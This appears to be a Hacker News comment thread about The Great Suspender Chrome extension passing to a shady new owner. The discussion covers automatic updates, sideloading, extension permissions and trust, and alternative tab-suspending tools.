On the other hand users are generally pretty poor at managing software themselves and as long as it works they'll happily and probably ignorantly run something that is not secure already and needs an update.
> users are generally pretty poor at managing software
This is an assertion which begs many questions.
Who are these users? What do you mean by "generally"? What do you mean by "poor"? What do you mean with "managing software"? Which software specifically? Why is "managing software" hard? What are specific case where this might be true? Is this statement falsifiable?
For instance, how does age, social background, education level, language, culture,... factor into the experience of "managing software"? Sure, the problem can't be software itself in it's entirety?
See, statements like these tend to break down once you start digging into the murky nuances and specificities of reality.
Moreover, accepting them at face value tends to reinforce a belief which isn't based on fact: that the users of digital technology can't manage their devices, and therefore shouldn't be confronted with managing their devices.
... which is then translated and implemented in interfaces and systems that simply lack the functionality that gives users fine grained control over what is or isn't installed.
Over a longer term, this promotes a form of "lazy thinking" in which users simply don't question what happens under the hood of their devices. Sure, people are aware of the many issues concerning privacy, personal data, security and so on. But ask them how they could make a meaningful change, and the answers will be limited to what's possible within the limitations of what the device offers.
A great example of this would be people using a post-it to cover the camera in the laptop bezel.
People don't know what happens inside their machine, they don't trust what happens on their machine, and there's no meaningful possibility to look under the hood and come to a proper understanding... so they revert to the next sensible thing they have: taping a post-it over the lens.
The post-it doesn't solve the underlying issue - a lack of understanding which was cultivated - but it does solve a particular symptom: the inability to control what that camera does.
It really doesn't beg those questions - we have 25+ years of data backing it up. People across the board are bad about running updates. I'm guessing you missed the mid-late 90s when things like buffer overflows started to be exploited and firewalls became necessities because even the folks whose job it was to run updates of vulnerable systems with public IPs on the Internet... weren't. Then came the early 2000s and all the worms running amok because people still weren't running their updates. Then the collective web development industry screamed in pain because things like Windows XP and IE6 just would not die.
The collective Internet has been through this before and (mostly) learned its lesson. People don't run updates when it's not shoved down their throat. And it's not a small segment of people. And it hasn't changed. Look at how many hacks still happen because of servers and apps that aren't patched for known vulnerabilities. Or the prevalence of cryptojacking which is still largely based on known vulnerabilities that already have patches available - indicating it's successful enough that people keep doing it.
Most users don't question what happens under the hood of their devices because they don't care. They have other things to care about that actually mean something to them besides the nuances of the day to day maintenance of their devices. There does not exist an effective way of making people care about things like this, let alone educating the masses on how to appropriately choose which commit hash of their favorite browser extension they should really be on. How many security newsletters do you really expect the average person to be subscribed to in order to make informed decisions about these things?
Hell my "Update" notification on Chrome is red this morning and I'm at least in the top 10% of security-conscious folks in the world (it's really not a high bar).
I'm not saying automatic updates are without their problems - I'm in a thread on HN about that exact thing. But trying to claim it's somehow about sociodemographic issues and the answer is solving that and going back to selectively running updates is just ignoring the lessons of the past.
I, and everyone else I know, do not install updates to our software in a timely manner unless we actively need a feature.
Users are "I, and everyone else I know".
Generally is "unless we need a feature".
Poor is "do not install updates to our software".
Managing software is "install updates".
Software is any software we use that provides updates, which is all of it.
Managing software is hard because doing it manually would require checking the website of every piece of software you've ever downloaded at regular intervals, where regular could be as frequently as minutes for security-critical tools.
If I ever downgrade my software and lock it to a specific version, I am now managing it manually, and all of the above applies.
I honestly don't think there are unquestioned assumptions here, because the task of keeping security-critical software up to date manually is nearly impossible for any user.
I don’t see how one could parse ”On the other hand users are generally pretty poor at managing software themselves” and assign that interpretation to “poor”.
I'm challenging your initial assertion that "people are poor at managing software". That's not enough of an explanation to support the second part of your claim:
> and as long as it works they'll happily and probably ignorantly run something that is not secure already and needs an update.
Are they poor at managing software because they are ignorantly running insecure software? Or are they ignorantly running insecure software because they are poor at managing software?
The replies so far take the entire context out of the picture and reframes the issue to "Users use their devices the 'wrong way'." and this can only be solved through technological advances.
I'm here questioning and challenging those assertions.
That would cover users who are poor at managing software. Being able to turn them off would require someone to be good at managing software. Why remove control from those users?
I don't want to be saying that we should remove control, but I actually do think it's reasonable to. Even on a single-user device, security issues are not isolated. An infected machine will likely be used for things like spam and DDOS.
If you make something available for people to toggle that improves their experience, people are going to take advantage of that even if they don't really grasp or decide to ignore the consequences. In the case of updates the improved experience is not being nagged or forced to restart an application or the whole OS. And unfortunately the only way to really gatekeep that control to people who know what they're doing is giving it enterprise pricing.
I want to think that folks who would chose that option would be responsible, but the amount I hear from other developers who defer updates on Windows 10 to the maximum (1 year...) and still are upset when they have to reboot makes me think that even experienced users present a risk.
Users never upgrading their software certainly also leads to security problems though, it's not a solution, and it is reasonable to try to set things up so this doesn't happen.
Wouldn't an easy solution be to turn auto updates on by default, and warn users that turn it off that they are opening themselves up to potential security issues, and to do so wisely?
The issue comes when an auto update regresses something that the user relied upon. As long as the automatic update has a 'downgrade' option that's tenable but most of the solutions out there make downgrading difficult.
I prefer automatic updates that are presented to the user for action, sadly feature update/release notes are often hidden or content-free (cf. Google's apps' updates on the Play Store) and downgrading path varies heavily with OS (easy on Linux, impossible on iOS).
Sure, that'd be one solution. I wonder how many users would end up with auto-updates off, and how many of them would actually understand the risk.
Many users are going to change configuration because some tutorial on the internet somewhere tells them to do it, without totally understanding what they are doing, and are unlikely to revisit this configuration again ever. (Heck, I have done that with some configurations I don't totally understand, and don't even remember what I did and will never revisit to change back).
But it might be a fine way to do it.
But in analysis there is a shift from "can we blame someone else [users who ignored our advice] if the ecosystem ends up very insecure", to "how do we actually keep the ecosystem secure, not just have someone to blame when it isn't?" Doing the latter while also providing for user flexibility and autonomy can be a challenge for sure.
I don't think turning automatic updates would be the right way to deal with this. See: Windows. If a piece of software becomes malware it needs to either be forked or retired completely, running unmaintained legacy versions of software is not sustainable.
I have plenty of things I want to complain about when it comes to Google's user-adversity but mandatory automatic updates is definitely not one of them.
If you're a technical user and really know (or really think that you know) what you're doing there are ways to effectively freeze a given version of an extension.
Or just add permissions and ask the user when the extension asks for new ones? e.g. permission to talk to the outside world that something like TGS shouldn't need to just do its job.
I never even patch automatic updates to my OS either (e.g. OS bigSur). I'd rather not guinea pig the latest updates and they usually don't add all that much value for chrome extension releases either, so a way to turn off automatic updates in chrome is highly desirable for me.
Download and unpacking from github is a pita, I'd need to do this to each of my computers seperately
I work in software. I know the dangers of a day 0 exploit. I also know the dangers of an x.0 release of software.
Security is often in tension with convenience/usability (as in this case).
Concretely: I don't update to the latest MacOS day of release. I do update after a few weeks of "no significant issues reported" (or I'll update manually faster if I learn of a serious exploit). I still haven't updated to BigSur as some of the software that I rely on doesn't work on BigSur yet, so I'm on the latest patch of Catalina.
I'm not going to update to a new MacOS "named" release until it's been out for a while and probably has a patch release or two, agreed.
But I install MacOS patch releases as soon as they are offered. It has never caused me a problem I am aware of, and I don't want to miss out on security patches, or even just bugfixes and perf improvements.
Heck, I actually just upgraded a MacBook that was still on 10.12, which was EOL'd. But I upgraded it because it was EOL'd, and wasn't getting patch releases for security fixes, and I want those patch releases as soon as they are released!
You should let clients and users know that you care more about convenience than security so that they can make an informed decision about whether to trust their data with you.
I don't know what x.0 software updates you're talking about (Chrome or Mac), but my comment never mentioned any. You don't seem to know that browser vendors don't really do those like OS vendors do. Either way, you can still avoid those while gettong security updates.
In my memory, there hasn't been a breaking auto-update in Chrome in years, but there have been hundreds of 0-days. The numbers don't really work out for the tradeoff you claim to be making.
My wife installed an addon to be able to post Instagram posts from her laptop, and then suddenly clicking on google search results would sometimes, but not always hijack and redirect to bing, and then click on one of the ads. But it was clever because it only happened sometimes, and if she retried it it didn't happen, so whenever she would try to show me, it didn't happen. I just removed all her addons and the problem went way, so not sure which one it was.
It's things like this that make me a lot more reluctant to install extensions that might be moderately convenient. Maybe they're okay now, but it's too much of a burden to keep track of what I have installed and which ones are known to be doing something nasty.
Another loser in this whole game is the honest hobby extension developers, who have to deal with the power-users who might promote their extensions not wanting to bother for fear of not being able to keep a watch for potential malicious updates for all of them.
I was just thinking about something similar. It would be nice if at a minimum, we could put together a list of compromised extensions. I feel like I've seen quite a few of these reports recently
It should be possible to look at the source code of known compromised extensions and put together a list of heuristics that could automate part of the process. Minifiers make it more difficult though.
You should be able to do some of that at the debug console level. But otherwise you're stuck tracking traffic at page level, at least as far as I know.
Quick note about the workaround mentioned in this article - the suggestion to download the last known good version of the extension and sideload it is a good one, but it has some problems on Chrome.
Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.
One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)
Firefox has similar restrictions... you have to side load through Developer Options. If you’re not a developer, you will be questioning why you’re doing this and the less-technically inclined will simply never do it (like my wife)
And it is not entirely nefarious as you suggest. It limits the damage that sideloaded extensions did roughly 2010 and earlier. The WebExtension API was another assault on extensions. These days, chrome and Firefox have essentially closed a huge attack vector even though extensions are a shadow of their former selves. I was a skeptic for a long time (why should power users pay for the faults of everyone else?) but no more. Kudos.
Availability is part of security, and the most secure system is disconnected from the internet and powered off. Why are we cheering our software becoming less useful in the name of safety? The switch to WebExtensions was a monstrous loss of functionality!
Chrome sideloads extensions through a similarly obscure menu - My main quarrel is the prompt where the default option is to uninstall that appears on every launch. Firefox doesn't have that.
Firefox also permits self-hosting extensions signed through their store, providing more freedom for extension developers.
yeah i kind of hate it but i can't really blame them for doing it, since before they did that, if you installed software from questionable sources like, say, java from the oracle website, it would bundle an ask toolbar with it. and this was so common
I'm not sure what screen "Developer Options" is referring to, but you can load add-ons directly from your hard drive with no fuss from the Add-ons page (though you must be running the Nightly or Developer version of Firefox). Click the gear icon right above your list of installed add-ons (this is also the menu that lets you disable auto-updates).
I can see why you'd think that but in practice I assure you that your concern is unwarranted. I've been using Nightly Firefox exclusively for almost ten years and I honestly can't remember it ever crashing (excluding the times when I was manually futzing with experimental about:config flags back in the electrolysis days).
As for the developer edition, it's literally the version that they expect web developers to use; it's not half-baked software by any means.
The Developer Edition is not a nightly build, it’s a beta build, so there has been some testing (Before I switched to stable, I only once had an issue). Your point stands though.
Installing extensions from a file is supported in the latest mainline FF (84.0.2), nightly or dev are not required. I currently have one installed. It just shows a confirmation dialog and then installs it.
This is true but misleading: the extension you install from file has to be signed by Mozilla in exactly the same way that extensions on the store are signed.
You can remove the signature requirement on stable by setting `xpinstall.signatures.required` to `false` in your user.js / about:config
(I wrote most the extensions I installed for my own bespoke use, built locally as zip files and installed via "Install Add-on From File...", and I don't have a problem trusting myself.)
I don't think this is is true for the official Mozilla builds (except for Nightly, Beta and unbranded). It's possible that your distro has a custom build that allows the setting. Arch builds Firefox with `--allow-addon-sideload` which could be the culprit.
No promises that that's actually the right flag. I had a rummage around searchfox and it looks like that just enables extensions that have been placed in special directories (whether they must be signed or not is a different flag). There clearly is a setting somewhere though as the unbranded builds exist...
> Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.
I've been sideloading vimium and thegreatsuspender for years and I haven't seen this message ever. Not on Mac nor Linux.
You could download it and publish it yourself. I have a extension I wrote myself, and while I occasionally see something about having to pay $5 in the extension management panel, it never forces me to do so. If they closed that hole, perhaps it's worth the $5 developer registration fee to some.
When did you publish your extension? I'm an extension developer that makes a mildly popular extension used by a niche group (1-2k MAU) and the Chrome Web Store has tightened their policies over the years. It's possible that you're grandfathered in (and haven't hit any of the extra reporting requirements if you haven't updated your extension recently.)
Extensions these days go through a rigorous review process, and Google regularly shuts down / imposes arbitrary restrictions against extensions due to changing policies.
I understand the importance of strong moderation to protect users from malicious extensions, but I believe Google is using that as an excuse to further lock down their store, increasing barriers to entry and making it harder for developers to build software to extend the most popular browser in the world without Google's blessing.
I hadn't looked at it for a while, so I just did so.
You're right...it won't let me update it now without a lot of justifications on their privacy tab. However, it is still published. The status is "Status: Published - unlisted", so I can't search for it, but I can go direct to the store url for it.
Yeah, that matches up with what I've seen. They've at least been decent enough not to kick people off the store, but I don't think it's possible to just have them sign / publish something unlisted these days without a good deal of policy writing and justifications.
Yet the large actors still publish malicious updates to extensions. ¯\_(ツ)_/¯
They have this "private" feature now where you have to list the email addresses of people that are allowed to use the extension. I don't see why that couldn't be coupled with "no review required", so long as the list is relatively short. But, yeah, likely will never happen.
Fortunately for me, I can re-do my extension to use the JS postMessage api which won't require hardly any permissions, and thus, not much to review.
I'd switch to firefox but it is noticeably slower loading facebook and twitter, the sites I go to most often, and I trust it only like 25% more than chrome. :/
The MS Edge dev channel has a basic form of tab suspending built into it now. Based on my non-rigorous testing it seems to actually save more memory than TGS ever did so I just removed the extension entirely.
It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(
> We actually had a great chat with the author of the Great Suspender extension while developing tab discarding and they're glad to see us natively tackling this problem in ways that are more efficient than an extension might be able to, such as losing the state of your user inactions.
In fact tab suspending/discarding has been built into Chrome for some time now and Great Suspender does optionally make use of the built-in functionality.
I still sometimes use extensions like Great Suspender to give more control over the process (e.g. to suspend more aggressively on RAM-constrained machines or where the user uses a lot of tabs).
Since this news came out I have switched to "Auto Tab Discard".
The functionality is built-into Chrome, the native tab discarding just happens when it thinks memory pressure is too high. Extensions like this give you extra granularity to set it to happen after a timer.
> It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(
The way I see it, extension developers get to come up with innovative new features first, and then the first-party vendors like Apple, Google, and Microsoft take note and eventually do just that: Integrate it into their own products.
For example: The Great Suspender → Sleeping Tabs [experimental] (Microsoft/Edge); Flux → Night Shift (Apple/iOS); Growl → macOS Notifications (Apple/macOS); Swype → iOS Built-in Keyboard (Apple/iOS); etc
I used to use TGS excessively and TabsOutliner has completely changed my workflow. Now I just sort tabs into categories and then kill the entire window until I am in that context.
I personally use OneTab but it's worth noting that in the GH issue on TheGreatSuspender there's some ongoing (and mostly unsubstantiated, in this thread) concerns about OneTab's data collection and management[0].
It is "mostly unsubstantiated" because the thread makes multiple claims without proof. The bookmark pages on Google provide some evidence for one of the claims but it is, by no means, proof of the claim's validity.
I've been using it for the last few weeks, and it's been pretty good so far. It doesn't suspend music tabs when they're not playing (which TGS did automatically), but nothing much to complain about.
In Chrome, make sure you set your less frequently used extensions to run "On click" instead of "On all sites". Extensions -> extension details -> Site access.
For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.
Among other things, this is why when people say "HN doesn't need a dark mode, just use an extension", that isn't a valid solution. For years now I've refused to install any extensions that aren't too-big-to-compromise (which in practice - for me - means AdBlock Plus and maybe React Dev Tools), and that should be everyone's policy. Any extension whose compromise wouldn't damage the reputation of a billion-dollar organization is simply too juicy of an attack vector.
But is it better known? That's the determining factor here. The Great Suspender was well-regarded in certain circles, and even fairly well-known (I've never used it but I've heard of it). But even it apparently wasn't above compromise. To be reasonably safe, an extension has to either be a) so well-known that they'd never be able to get away with silently adding malware (because someone would notice, which to be fair is what happened here), or b) tied to a major brand that wouldn't want to sell out to some shady firm, on PR grounds alone.
I see the distinction you are making, but there are many people (here especially) whose definition of "compromised" is not limited to malware (or whose definition of "malware" is not limited to what is happening with TGS).
I agree that extension security isn't considered nearly as often as it should be, though my barrier isn't quite yours. For me, it comes down to developer trust and permissions. If someone I trust wrote a small, feature-targeted extension, I would probably be comfortable installing it. Similarly, if the permissions an extension has are tightly scoped to its use case, I'm more comfortable installing it.
Now that I write that, I'm not sure how permissions and upgrades go together. If an extension that had tight permissions relaxes them I'd get notified before they took effect, right?
> Disable analytics tracking by opening the extension options for The Great Suspender and checking the box “Automatic deactivation of any kind of tracking”.
> Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)
Does Debian ship packages for individual browser extensions?
I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:
* pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home
* continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole
Auto-update is a mixed bag. We got into auto-update as a standard practice over the last decade because a large fraction of users never updated anything, so security issues would linger forever (not to mention ancient software versions holding back platform technologies, and financial concerns for software shops).
So it's not that auto-update is flatly a bad idea, it's more that it's a trade-off that sometimes makes security issues almost evaporate, and sometimes makes them impossible to dodge.
I think the difference with browser extensions is the anonymity and speed of changing owners. There's more momentum to notice big companies going downhill (+- stuff like sourceforge)
Packages in the default repos for some large Linux distro are usually reviewed and tested by many people until they make it into updates for current stable version, so while it's probably not entirely impossible for some malicious code to get in, it seems pretty unlikely. Unlike browser extensions, where the current owner can upload anything they want and it's pushed to the users without them even knowing.
The fact that you have to manually type in `apt-get update` (or similar) means it's not automatic. You have full control over when the update takes place, and which packages get updated.
When discussing software updates, I feel like folks on HN commonly overestimate how much impact opportunity for controlling updates has. I haven't seen someone in my social/professional circles ever hesitate before applying an apt-get update. Nobody I've known checks changelogs (except developers checking on direct dependencies), nobody reads the patches for the updates to verify nothing malicious slipped in. "There's an update, I'd better apply it, unless it smells like a breaking change."
So in practical terms, my experience is that vanishingly few people will behave differently than an auto-update system would behave, except in rare occasions like a malicious update making the headlines. We definitely need a solution for rejecting malicious updates, but I feel backing away from auto updates throws the baby out with the bathwater and would be a net-negative change for the industry and for users.
There are exceptions but I think that’s true in the same way people tell their doctor they eat well, exercise daily, and go to sleep on time every night — aspirational, almost certainly discounting the times it doesn’t happen as exceptions and ignoring the actual frequency. The most I’ve seen people consistently do is delay a little in case an update is pulled, and statistically nobody does the kind of analysis that you’d need to catch an unadvertised change.
There's also the occasional _necessity_ for making a breaking change, in particular _breaking some exploit_ and thereby making the software more secure.
I don't envy Chrome leadership's decision or having that problem to solve.
I don't think the question is about control but rather whether automatic updates, when intentionally activated by the user, contribute more positively to the system's security than negatively.
Without automatic updates, you might be more inclined to put off a patch which turns out to be urgent. Or you might be more likely to lose track of which patches have been applied across your various systems.
It's more the chance of an unexpected breaking change. When you use a package manager, you're expecting stuff to change (and get to review what's changing).
Upgrading manually regularly: Good idea.
Having a cronjob to do it automatically without user intervention: Bad idea.
I recently had to install Certbot on a CentOS 8 server and discovered that the Certbot documentation recommeds using Snap (for almost every popular GNU/Linux release). They have their reasons[1]. I figured it was time to investigate using Snap and the benefits it could provide.
While researching, I found many users reporting that forced updates of software installed by Snap caused many problems and I decided against using it; I was able to install Certbot via a good old-fashioned RPM from EPEL.
I also removed Snap from a different Ubuntu server which had recently been upgraded to 20.04 (I wasn't using LXD on that server so there was no need for it).
FWIW, I've been allowing Apt and Yum package managers to automatically update for about 8 years without any problems. The only manual OS updating I do is for a set of physical (non-virtual) servers that are operational 24/7.
It'll be a "great" day when someone manages to do big damage with code that Google hosted and delivered to the victims... IMO it's just a matter of time.
As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.
From the website it sounds like the favicon is changed. So the tab doesn’t go away it’s just on pause
Google: “ a discarded tab doesn't go anywhere. We kill it but it's still visible on the Chrome tab strip. If you navigate back to a tab that's been discarded, it'll reload when clicked. Form content, scroll position and so on are saved and restored the same way they would be during forward/backward tab navigation.”
In the future this will be updated to also use a serializer for discarded tabs.
I don't use Chrome so I have no idea what either of these extensions did, but FF's implementation of tab discarding causes it to reload the page when I switch to the tab, which means I have to wait for the page to load before I can do whatever I wanted to do.
I'd much rather have a way to just stop all JS on a "suspended" tab so that FF doesn't burn 20% CPU on tabs that aren't even visible. (Yes I'm aware that JS timers, etc operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.) Discarding may be more efficient for the browser but it's less efficient for me the user, so I don't use it.
Fair enough, although that is not what Great Suspender did. Great Suspender also causes the page to be reloaded on resumption, just like an early version of tab discarding.
Tab discarding does have the slight advantage that it remembers what you typed in on the page and where you were scrolled (but nonetheless still causes a reload).
Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc. Whereas you could simply use bookmarks instead of open tabs to get the same effect (EDIT: actually tab discarding would already be better than that method as you note).
>What you are asking for regarding slowing the performance of background JS is something browsers already do
As I wrote:
>>(Yes I'm aware that JS timers, etc operate at reduced frequency for unfocused tabs. I'm talking about stopping them entirely.)
>Making that behaviour more aggressive seems like it is liable to cause significant problems to the user experience with minimal benefits. E.g. background media playback would likely be broken, notifications, etc.
I want none of those things from the "suspended" tabs.
>Whereas you could simply use bookmarks instead of open tabs to get the same effect
How? Do you mean I would load the bookmark into a new tab when I wanted to visit it? That not only has the same problem that I described for discarded tabs (have to wait for a page load), but is even worse because it loses all the context that discarded tabs do retain. Not to mention the annoyance of maintaining bookmarks for arbitrary tab groups that I just happen to have open.
I have always used The Great Discarder instead [1]
It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).
> Apparently recent versions of this extension have been taken over by a shady anonymous entity...
That's something that worries me, whenever I install a software with trusted privileges.
Software companies can sell their products -- and user base -- to other companies without notice.
And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?
This is why I stopped using extensions in any browser years ago unless it came from a trusted company I pay directly (i.e. 1Password). The broken economic model means that the developers always have pressure to cash in on a popular extension and Google has set things up to make abuse fast and easy with automatic silent updates and their usual skimping on human review. By the time the news about TGS came out most users already had the next release installed.
Indeed. There was never a basis for trusting The Great Suspender in the first place. "Read and change all your data" is a permission that should be reserved for code you wrote yourself.
It’d also be interesting to see how much further you could go with permissions restricting access. For example, my 1Password usage needs to be able to read/write DOM element values but you could potentially say no network access or ability to create script or style elements. I’m not sure how much further sandboxing could practically be taken but it really seems like the all data, all sites permission needs to be much rarer than it currently is.
The desktop app does that, not the browser extension, so it should in theory be possible to avoid allowing it to inject arbitrary code which allows connections to anywhere in the browser by limiting it to localhost.
Unfortunately, I’m not sure that a reasonable UI for something like this would be feasible without everyone just being trained to click Approve. Some kind of review process could work but that’d put it back in needing Google to admit that they need to pay humans to operate a service.
According to the homepage of a company that buys apps, and as a first approximation, that would be "anywhere between 8x - 36x monthly revenue for apps. In most cases this is well above the standard market value of 6-12x".
Whether they are lowballing candidates with that offer, I can't say.
<nope>The owner in the extension metadata on The Great Suspender hasn't been updated (to my understanding) so the Chrome Web Store doesn't even know that the owner has been changed.</nope>
Actually it does appear that the owner was changed from "deanoemcke" to "thegreatsuspender" (the new mystery owner) on the Chrome Web Store page.
I agree that warning when updating an extension if the stated owner has changed would be valuable.
For those interested in understanding the security of Chrome extensions, duo introduced CRXcavator (https://crxcavator.io/) a while back, which does some risk scoring around permissions. It is chrome-only, and it doesn't protect against this type of attack specifically, although you can look at the Potential External Communication section for possible issues.
Google Chrome now has tab grouping. In Beta, you can click on the group name and collapse the tabs. Based on their reload times, it seems chrome suspends the tabs in the background when you collapse the group.
This looks promising. To activate the suspend on collapse feature enter "chrome://flags/" into the address bar and make sure these experimental features are "enabled": #tab-groups, #tab-groups-collapse, #tab-groups-collapse-freezing. I also enabled: #tab-groups-auto-create.
Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.
As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more dicided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.
I wrote about this back in 2012 predicting what would happen:
Recently I wanted to build one of Signal’s libraries so that I could use it with signal-cli. It astonished me that building this secure messenger requires automatically downloading a whole host of third-party dependencies through wget from some disparate repositories, which presumably had received little vetting.
What happened to the notion of using stable, centralized package repositories like Debian’s or Red Hat’s in order to build one’s software? I did a lot of Free Software development in the early millennium, then was away from the scene for a few years, and when I came back this desire for convenience above all else really baffles me.
At Qbix, we have built everything in-house and the few dependencies that we do pull in, we vetted and pinned the versions. People have criticized us for that in the past but if we are ever to get past trusting large, centralized entities for our server back ends, we need to make sure to kick the open source movement to the next level:
I'm now framing the problem as "inauthentic speech".
> ...go towards more “peer review” like in science.
Ditto journalism and reporting.
This is a universal problem. The core solution remains the same.
Cite your sources
Show your work
Sign your name
WRT John Walker's screed, I really thought certificates and web of trust would have become the norm by now. Anything unsigned would be treated as gossip or worse. Certs could be revoked as needed.
Further, every trusted digital relationship would start with a key exchange. Vs relying on username and password. eg Banks would issue me a Secure Enclave of some sort, like a USB fob.
I'd like to understand why this didn't happen. My best guess is "Worse is better" enabled predators and parasites. Which has been acceptable during the gold rush.
I disable automatic updates for all extensions, as well as personally reviewing the source of every extension before installation.
The review doesn't take much time. What I look for:
1. The manifest for what network endpoints the extension is allowed to call.
2. Any URL in the code that is external to the extension.
3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
4. Whether there is any obfuscated code or not.
If anything found in those spots seems fishy / unclear, I don't install the extension.
Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.
Like others above, I don't use many extensions, but those I use I have to trust.
Ironically, I tracked the real world identity of someone using stolen credit cards in my ecom site BECAUSE he posted a tutorial/how-to on YouTube showing the vulnerability tool (script kiddie), under his real name. SMH.
This won't stop this information from being disseminated, but it may save some idiots from themselves.
By the way, is there an extension (I'm interested in both Firefox and Chrome) which would force all the new (background) tabs to be created in the suspended state (like if you had opened them in background and then restarted the browser) and only start loading after you actually open them?
Thank you very much! Not really a perfect solution (you still have to make many clicks, I just use MiddleClick or Ctrl+LeftCLick to open a background tab normally) but a really great extension nevertheless. I'm very happy to discover it.
Lifehack: export your suspended tabs as a flat file through the interface, uninstall the add on, then follow the downgrade as the blog suggests, at the end reimport your tabs from the flat file
Doesn't chrome already suspend background tabs without plugin? At least I'm unable to properly have browser games running unless they're in a visible tab.
Seems there should be an extension which checks other extensions for nefarious activity or notifies you of the events that are mentioned in the article.
That's why I don't trust Chrome extensions. There have been too many instances of a popular instance being taken over to run malware. I don't think Google's handling of these security issues has been adequate.
Thanks for this! I've been using this extension for a long time and just removed it today. Honestly, with Macbook Air M1 there is no need for suspending tabs any more because the battery life is amazing, so that also helps.
At this point, I would gladly pay good money for a browser that prevented ads and tracking, provided most of the standard plugin functionality oob and vetted the rest. This whole mess is a massive time suck.
I've been using Sidekick,it has done a lot for me in terms of substituting extensions like TGS, It has its own tool for tab grouping and sessions, plus adblock. It has been good for productivity
Is there a tool which will automatically reload all your extensions from disk, as described in the OP? Seems like a sensible default, from a security perspective.
Chrome throttles tab CPU activities when backgrounded, but doesn't clear memory for the tab. For users like me who usually have 50-800 tabs open across all my browser windows, that really adds up. I also appreciate (err... appreciated) The Great Suspender because I didn't want all of those tabs active every time I opened a browser, so I'd have scores of tabs that never even got loaded, but were ready to go the moment I wanted to return to them.
I'm genuinely curious why that would matter: modern operating systems (heck, even not so modern ones) already move stale data from active memory to virtual memory in order to service active processes/threads, so if you're the kind of person who keeps hundreds of tabs open (and memory isn't the real problem if you do) then the OS is already keeping all that content on disk, not in memory...
Any time I'm working on something, I inevitably end up with 20-30 tabs with different things I'm referencing. Especially documentation. I think I have around 6-8 open when I'm not doing anything, since I pin some web apps (e.g. Facebook Messenger) or dashboards.
It's also the best way to browse image galleries: middle click everything into new tabs, navigate them with the keyboard, and close them as you go. Beats clunky JavaScript lightboxes.
I'm a software developer and am always hovering around this mark. It's usually from digging through documentation, having multiple tabs with different areas of the app you're working on open, productivity tabs like Slack and Gmail, then personal tabs like Reddit and YouTube
Try the extension 'Session Buddy'. You can view all open tabs and windows, group them as needed, and then save, close, and reopen sessions and groups.
I routinely research several related topics for a project, and I will need 10-30 tabs per topic open at once. Surprisingly, chrome manages to handle 100+ tabs on my system with out issue.
When I have 100 tabs open, 90 of them are one time use pages. I need to compile bits of information from each page, and then I never need those pages again. Why would I use bookmarks?
For example, last week I was shopping for a very specific, very expensive ceramic thrust bearing. I had 20+ pages open from 10+ suppliers and documentation sources. I needed those open all week while we decided on which one to buy. This was a minor background task, so I also had 60 other tabs open for my normal work flow.
Just because people use a tool differently than you doesn't make them wrong.
It'd be great if someone invented a method of working with bookmarks that worked as easily and seamlessly as tabs.
Back in the days of social bookmarks (like del.icio.us) pretty much everyone had a "toread" folder. The main problem is that you have to remember to delete them after reading them. That's not really a problem for good articles you remember reading, but the crap articles you don't remember, or quit reading are easy to forget to delete from the bookmarks. So, you end up reading the same crap articles several times. With a tab, you close the window and you're done. With bookmarks, you have to close the window, go through your bookmarks, find the one that was crap that you have already forgotten and delete it.
There's several other advantages to tabs too:
Like the fact that they're naturally organized by window based on the task you're doing.
You'll see them more often, and thus be reminded more often.
They save context, like forwards and back history, and information you may have typed in, or a UI you may have manipulated.
That brings me to the problem with links as well as with e-books: you don't usually see them. When you have an open tab, you see it all day long until you get rid of it. When you have a printed book, you bump in it on a daily basis (unless you hide it in more books).
Also bookmarks don't save page context. If I'm doing something -- even something simple like scrolling down a page -- and get interrupted, it's just easier to leave it open.
Yep. Tab history is important. How I got to some page is almost as important as the page itself.
I've been using large tab sessions ever since Opera 5 in the early 2000s. Back then I'd have 20-50 tabs or so. These days I have sessions of 500 active tabs and 500 suspended. It's great. I have full text tab search, and since my sessions last years, I know the general location of all important tabs. ALso, since I use a single process brower and NoScript, all those 500+ tabs take under <3 GB of ram.
It's matter of taste, but it's no new trend. Tabs, and tab users, have been around for 20 years now.
